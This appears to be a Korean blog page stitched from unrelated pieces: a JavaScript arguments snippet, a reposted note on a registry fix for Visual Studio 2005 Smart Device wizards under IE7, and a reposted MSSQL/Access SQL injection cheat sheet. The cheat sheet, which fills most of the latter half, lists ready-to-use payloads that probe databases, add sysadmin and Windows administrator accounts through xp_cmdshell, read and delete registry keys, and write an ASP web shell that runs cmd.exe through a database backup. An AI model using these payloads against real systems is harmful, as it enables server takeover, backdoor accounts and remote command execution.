function test()
alert( arguments.length );          // 결과 : 3
alert( arguments[0] );               // 결과 : 0

test( '0', '1', '2' );


IE7 and Smart Device Projects in VS 2005

Coming back from the Holidays, my Visual Studio 2005 installation would fail trying to create a new native Smart Device Project. Uninstalling the Windows Mobile SDKs and reinstalling them... and even uninstalling/reinstalling Visual Studio did not solve the issue.

I was finally reminded of an issue I had seen a while back. Installing IE7 caused this problem! Fortunately there is a workaround. Fernando Zandoná, the PM in charge of our Windows Mobile SDK logged this issue and many others a while back in his blog.

Unable to Create Native (C++) Projects
VC++ Project Wizards are pretty much HTML files + scripts - Visual Studio uses IE to render and present those "web pages" as a wizard. The problem is that, due to the new security model, IE7 does not trust some of those scripts; as a result you keep getting the "New Project" dialog and can't move forward on the wizard. The workaround here is to let IE know that the smart device VC++ wizard is a nice guy and ok to run.


You will need to open the registry entry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved

And add a new entry named: {D245F352-3F45-4516-B1E6-04608DA126CC}

 This solved the issue and I can get back to coding!

 -Luis Cabrera

*출처 : 

-> Windows Mobile 5.O 개발 환경을 만들고 스마트 장치 응용 프로그램 프로젝트를 생성했는데 안된다. 망할.. IE7 이나 IE8 이 설치되어있다면 안된다. 처음에 IE7, IE8 다 지우고 하니까 되드라.. 근데 다시 IE7을 설치하니까 또 안되드라.. 그런던 중 위 방법을 찾았다. 레지스트리에 위의 키 하나만 추가해주면 해결된다... 완전 삽질했다. 깔았다 지웠다. 하루종일~



1. 다음과 같은 조건식을 삽입한다.
;and 1=1
;and 1=2 
;and user>0

2. 기본적으로 제공되는 기본 시스템 오브젝트에 대한 조건식을 검사해 본다.
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

3. where 조건식을 넣어 본다.
'and ''=' 
'and  '%25'='

4. select 구문을 사용한다.
;and (Select Count(*) from [테이블명])>0 --
;and (select top 1 len(열수) from 테이블명)>0

5. 컬럼명 추출
(1) Access 경우 :  and (select top 1 asc(mid(컬럼명, 1,1)) from 테이블)>0 

(2) Mssql의 경우 :  and (select top 1 unicode(substring(컬럼명,1,1)) from 테이블명)>0

6. 데이터베이스 권한

;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- 
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));-- 
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));-- 
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));-- 
;and 1=(SELECT IS_MEMBER('db_owner'));-- 

7. 스토어프로시저를 이용한 계정 추가하기  
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

8. dir 결과쿼리하기 
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:' 
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

9. 디렉터리 정보 추출하기 및 웹쉘 실행  
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 
;insert temp exec master.dbo.xp_availablemedia;-- 
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';--

10. 확장스토어 프로시저 공격

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionRun'  

;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','CommonFilesDir'  

;exec xp_regwrite HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','ValueName','reg_sz','hello'

exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersion','TestValueName'

xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsCurrentVersionTestkey'

10.mssql의 backup용 webshell 생성하기
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:l.asp';

;and (select @@version)>0 
;and user_name()='dbo'
;and (select user_name())>0 
;and (select db_name())>0 

use model 
create table cmd(str image);
insert int cmd(str) values ('<%=server.createobject("").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:wwwtestl.asp'; 

[출처] [mssql] 중국해커의 MS SQL 인젝션 해킹기법|작성자 weespk


+ Recent posts